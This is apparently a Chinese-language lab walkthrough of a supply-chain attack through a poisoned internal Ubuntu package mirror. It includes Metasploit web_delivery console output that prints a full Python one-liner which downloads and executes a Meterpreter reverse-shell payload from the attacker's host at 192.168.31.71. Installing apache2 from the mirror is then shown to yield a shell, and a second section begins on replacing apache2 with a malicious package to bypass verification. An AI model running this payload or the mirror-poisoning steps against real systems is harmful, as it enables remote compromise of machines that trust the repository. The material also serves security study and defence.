deb http://archive.ubuntu.com/ubuntu kinetic main restricted universe multiverse deb http://archive.ubuntu.com/ubuntu kinetic-security main restricted universe multiverse deb http://archive.ubuntu.com/ubuntu kinetic-updates main restricted universe multiverse #deb http://archive.ubuntu.com/ubuntu kinetic-proposed main restricted universe multiverse #deb http://archive.ubuntu.com/ubuntu kinetic-backports main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu kinetic main restricted universe multiverse deb-src http://archive.ubuntu.com/ubuntu kinetic-security main restricted universe multiverse deb-src http://archive.ubuntu.com/ubuntu kinetic-updates main restricted universe multiverse #deb-src http://archive.ubuntu.com/ubuntu kinetic-proposed main restricted universe multiverse #deb-src http://archive.ubuntu.com/ubuntu kinetic-backports main restricted universe multiverse
deb http://archive.ubuntu.com/ubuntu focal main restricted universe multiverse deb http://archive.ubuntu.com/ubuntu focal-security main restricted universe multiverse deb http://archive.ubuntu.com/ubuntu focal-updates main restricted universe multiverse deb http://archive.ubuntu.com/ubuntu focal-proposed main restricted universe multiverse deb http://archive.ubuntu.com/ubuntu focal-backports main restricted universe multiverse
deb http://<your-server-IP>/ubuntu focal main restricted universe multiverse deb http://<your-server-IP>/ubuntu focal-security main restricted universe multiverse deb http://<your-server-IP>/ubuntu focal-updates main restricted universe multiverse deb http://<your-server-IP>/ubuntu focal-proposed main restricted universe multiverse deb http://<your-server-IP>/ubuntu focal-backports main restricted universe multiverse
我的更新源服务器的IP为 192.168.31.117 ,所以配置内网其他主机的更新源为
deb http://192.168.31.117/ubuntu focal main restricted universe multiverse deb http://192.168.31.117/ubuntu focal-security main restricted universe multiverse deb http://192.168.31.117/ubuntu focal-updates main restricted universe multiverse deb http://192.168.31.117/ubuntu focal-proposed main restricted universe multiverse deb http://192.168.31.117/ubuntu focal-backports main restricted universe multiverse
msf6 > use exploit/multi/script/web_delivery [*] Using configured payload python/meterpreter/reverse_tcp msf6 exploit(multi/script/web_delivery) > show options
Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on t he local machine or 0.0.0.0 to listen o n all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (defau lt is randomly generated) URIPATH no The URI to use for this exploit (defaul t is random)
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be s pecified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Python
View the full module info with the info, or info -d command.
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.31.71 lhost => 192.168.31.71 msf6 exploit(multi/script/web_delivery) > exploit [*] Exploit running as background job 0. [*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.31.71:4444 [*] Using URL: http://192.168.31.71:8080/zQqeWQAQbo8cSb [*] Server started. [*] Run the following command on the target machine: python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.31.71:8080/zQqeWQAQbo8cSb', context=ssl._create_unverified_context());exec(r.read());" msf6 exploit(multi/script/web_delivery) >
deb http://192.168.31.117/ubuntu focal main restricted universe multiverse deb http://192.168.31.117/ubuntu focal-security main restricted universe multiverse deb http://192.168.31.117/ubuntu focal-updates main restricted universe multiverse deb http://192.168.31.117/ubuntu focal-proposed main restricted universe multiverse deb http://192.168.31.117/ubuntu focal-backports main restricted universe multiverse
8)安装 apache2 ,观察Kali是否返回shell
sudo apt update sudo apt install apache2
成功获取 shell
二、 直接绕过校验
这部分才是比较有意思的、新发现的东西
我们先将更新源服务器和受害主机都恢复快照
1)搭建恶意更新源
用恶意软件包替换官方原版 apache2
2)配置受害主机使用该更新源
配置受害主机使用我们搭建的更新源
deb http://192.168.31.117/ubuntu focal main restricted universe multiverse deb http://192.168.31.117/ubuntu focal-security main restricted universe multiverse deb http://192.168.31.117/ubuntu focal-updates main restricted universe multiverse deb http://192.168.31.117/ubuntu focal-proposed main restricted universe multiverse deb http://192.168.31.117/ubuntu focal-backports main restricted universe multiverse